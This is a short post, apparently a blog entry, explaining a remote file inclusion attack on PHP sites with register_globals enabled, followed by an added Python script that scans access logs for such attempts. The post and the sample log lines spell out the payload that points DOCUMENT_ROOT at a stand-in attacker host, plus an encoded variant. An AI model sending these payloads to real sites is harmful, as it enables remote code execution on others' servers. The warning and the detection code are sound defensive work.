Recently I got acquainted with a relatively new attack idea against sites with register_globals enabled: if the code contains include_once($_SERVER['DOCUMENT_ROOT']."file.php"), then it is enough for us to pass a line like "/?_SERVER[DOCUMENT_ROOT]=http://hacksite/hackcode.txt?" for the substitution to happen and our script to be executed on the target site.
The moral of this fable is old: be careful and never allow any request to be built from passed-in parameters. UPD: I'll clarify that there is already a bot scanning for this kind of vulnerability, and this log is real; only the site the log was taken from has been changed, so this is not just a theoretical vulnerability.
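Since bots already probe for this, the attempt shows up in access logs. The following Python check is an added example, not code from the original post: it flags requests whose parameter names target a PHP superglobal and notes whether the value is a remote URL. The log lines are constructed, and the names `scan` and `superglobal_overrides` are assumptions of this example.

```python
import re
from urllib.parse import unquote

# PHP superglobals that a request parameter must never be allowed to name.
SUPERGLOBALS = {"_SERVER", "_GET", "_POST", "_COOKIE", "_FILES",
                "_ENV", "_REQUEST", "_SESSION", "GLOBALS"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)

def superglobal_overrides(target):
    """Return (param, value, is_remote_url) for each suspicious parameter."""
    hits = []
    query = target.partition("?")[2]
    for pair in re.split(r"[&;]", query):
        # Split on the first '=' only; the value may itself contain '='.
        raw_name, _, raw_value = pair.partition("=")
        # Decode twice so double-encoded names (%255F...) are caught too.
        name = unquote(unquote(raw_name)).lstrip()
        value = unquote(unquote(raw_value))
        if name.split("[", 1)[0] in SUPERGLOBALS:
            hits.append((name, value, bool(REMOTE_RE.match(value))))
    return hits

def scan(log_lines):
    """Return one finding per suspicious parameter in combined-format lines."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value, remote in superglobal_overrides(m.group(1)):
            findings.append({"client": line.split(" ", 1)[0], "param": name,
                             "value": value, "remote_include": remote})
    return findings

# Constructed sample lines (documentation IPs, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2010:10:00:00 +0000] "GET /?_SERVER[DOCUMENT_ROOT]=http://hacksite/hackcode.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2010:10:00:01 +0000] "GET /index.php?%5FSERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fhacksite%2Fhackcode.txt%3F HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2010:10:00:02 +0000] "GET /search.php?q=document_root&page=2 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Jan/2010:10:00:03 +0000] "GET /?GLOBALS[debug]=1 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with `remote_include` set is the pattern described in the post; a hit without it is still a request trying to overwrite a superglobal and deserves a look.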